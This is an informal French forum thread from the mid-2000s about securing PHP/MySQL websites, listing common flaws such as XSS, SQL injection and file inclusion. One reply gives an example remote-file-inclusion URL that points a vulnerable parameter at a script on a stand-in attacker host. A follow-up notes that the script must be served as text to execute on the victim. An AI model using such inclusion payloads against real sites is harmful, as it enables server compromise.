Sécuriser un site !
Bonjour,
Voila je dois rediger un texte sur la sécurité d'un site web : je pensais aborder l'aspect protection technique et aussi les erreurs a ne pas commettre : comme comble les differentes failles :
J'ai essayer d'orienter mes recherches j'ai commencai avec ces mots clés : htaccess, sessions, cookies et pour les failles : xss, SQL injection , include, logs apaches . Merci de m'indiquer d'autre methode pour protèger son site , ou d'autres failles assez répendus sur le net et spécifique a php/mysql.
Merci de votre Aide,
Ciao,
I am singing in the rain , I am happy again !!
95% des problèmes de sécurité sont dus au cerveau qui se trouve entre le clavier et la chaise.
Il n'y a pas vraiment de failles spécifiques à PHP / MySQL mais juste des failles dues à des erreurs de conception.
oki 95% !
Ciao,
I am singing in the rain , I am happy again !!
Quand t'aura fini, tu pourra filer l'adresse de ton article?
merci beaucoup!
Merci à tous!! agilis...
pas de prob mais le prob c'est qu'il sera assez general, vu que je m'adresse a des personnes ayant jamais toucher au php et peut-etre a un ordinateur (lol ca serait etonnant pour des scientifique en ces temps !) , mais je peux te filer aussi mes sources ou sont trés bien détailler les failles les plus courantes en php ! ;)
Ciao,
I am singing in the rain , I am happy again !!
Mais il n'y a pas de "failles courantes en PHP" !!!
La faille, c'est le programmeur...
c'est vrai, donc pour corriger :"les failles les plus courament commises en php" , lol
Ciao,
I am singing in the rain , I am happy again !!
En gros: "celles que je commait" lol
Oui je veux bien tes sources car c'est mon gros problèmes, c'est de sécuriser mes sites. Merci beaucoup!
Merci à tous!! agilis...
yen a un grosse grosse failles ! c la faille include ! elle est presente dans ce genre de URl
http://www.site.com/page.php?affiche=http://www.google.com example et d site comme sa yen a plein alors un mechant hacker ki sy connai en php fera un page en PHP ki block le server et la metera sur son free (ex: hacker.free.fr/hack.php)
alors il retournera sur http://www.site.com/page.php?affiche=http://hacker.free.fr/hack.php
et hop site.com sera blocker !!!! dommage !
:)
le 30/05/2005 à 09:49
bibi
non, comme expliqué sur le site de frédéric bouchery, il devra le mettre en txt car si c'est en php, il sera interprété sur le server hacker.free.fr ;)
commit suicide
Ecrire un message
Votre message vient d'être créé avec succès.
BB-Code
Pour insérer une URL clickable
Pour insérer une adresse E-mail
Pour annoter
Pour écrire du code
Pour faire un lien vers une fonction PHP
Pour écrire du texte préformaté
Pour écrire du texte en gras
Pour écrire du texte en italique
Pour écrire du texte souligné
Pour écrire du texte barré
Pour écrire un titre principal
Pour écrire un titre secondaire
Pour écrire une liste
Smiley
:bond:
:boxe:
:bsmile:
:bump:
:clap:
:coeur:
:cool:
:cry:
:eek:
:evil:
:fleur:
:fou2:
:fou:
:grin:
:grrr:
:hammer:
:hippy:
:hum:
:idee2:
:idee:
:kdo:
:king:
:ko:
:lol:
:love2:
:love:
:mad:
:maitre:
:noel:
:oops:
:raa:
:razz:
:roll:
:sad:
:skull:
:smile:
:timide:
:trink:
:vice:
:vomi:
:wink:
:zzz: